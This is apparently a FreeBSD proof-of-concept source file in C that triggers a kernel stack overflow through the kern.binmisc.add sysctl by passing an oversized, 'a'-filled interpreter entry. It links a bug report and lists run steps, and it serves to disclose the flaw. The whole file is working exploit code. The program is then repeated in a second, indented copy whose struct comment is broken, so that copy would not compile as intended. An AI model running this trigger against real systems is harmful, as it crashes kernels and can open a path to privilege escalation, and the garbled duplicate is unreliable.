CTurt/x.c

## x.c
/*

	PoC for kernel stack overflow in sysctl handler for kern.binmisc.add:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0

	su
	kldload imgact_binmisc
	./x

	- CTurt

*/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>
//#include <sys/imgact_binmisc.h>

#define MAXPATHLEN 1024
#define	IBE_VERSION	1
#define	IBE_ARG_LEN_MAX	256
#define	IBE_NAME_MAX	32
#define	IBE_INTERP_LEN_MAX	(MAXPATHLEN + IBE_ARG_LEN_MAX)
#define	IBE_MAGIC_MAX	256

typedef struct ximgact_binmisc_entry {
	uint32_t xbe_version;	/* Struct version(IBE_VERSION) */
	uint32_t xbe_flags;	/* Entry flags (IBF_*) */
	uint32_t xbe_moffset;	/* Magic offset in header */
	uint32_t xbe_msize;	/* Magic size */
	uint32_t spare[3];	/* Spare fields for future use */
	char xbe_name[IBE_NAME_MAX];	/* Unique interpreter name */
	char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */
	uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */
	uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */
} ximgact_binmisc_entry_t;

ximgact_binmisc_entry_t xbe;

int main(void) {
	int result = 0;
	errno = 0;

	xbe.xbe_version = IBE_VERSION;
	strcpy(xbe.xbe_name, "CTurt");

	memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX);
	memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX);
	memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX);

	xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;

	size_t size = sizeof(xbe);

	result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size);

	printf("result %d\n", result);
	printf("errno %d\n", errno);

	return 0;
}
	/*

	PoC for kernel stack overflow in sysctl handler for kern.binmisc.add:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0

	su
	kldload imgact_binmisc
	./x

	- CTurt

	*/

	#include <stdio.h>
	#include <string.h>
	#include <errno.h>
	#include <dlfcn.h>
	#include <sys/types.h>
	#include <sys/sysctl.h>
	//#include <sys/imgact_binmisc.h>

	#define MAXPATHLEN 1024
	#define IBE_VERSION 1
	#define IBE_ARG_LEN_MAX 256
	#define IBE_NAME_MAX 32
	#define IBE_INTERP_LEN_MAX (MAXPATHLEN + IBE_ARG_LEN_MAX)
	#define IBE_MAGIC_MAX 256

	typedef struct ximgact_binmisc_entry {
	uint32_t xbe_version; /* Struct version(IBE_VERSION) */
	uint32_t xbe_flags; /* Entry flags (IBF_) /
	uint32_t xbe_moffset; /* Magic offset in header */
	uint32_t xbe_msize; /* Magic size */
	uint32_t spare[3]; /* Spare fields for future use */
	char xbe_name[IBE_NAME_MAX]; /* Unique interpreter name */
	char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */
	uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */
	uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */
	} ximgact_binmisc_entry_t;

	ximgact_binmisc_entry_t xbe;

	int main(void) {
	int result = 0;
	errno = 0;

	xbe.xbe_version = IBE_VERSION;
	strcpy(xbe.xbe_name, "CTurt");

	memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX);
	memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX);
	memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX);

	xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;

	size_t size = sizeof(xbe);

	result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size);

	printf("result %d\n", result);
	printf("errno %d\n", errno);

	return 0;
	}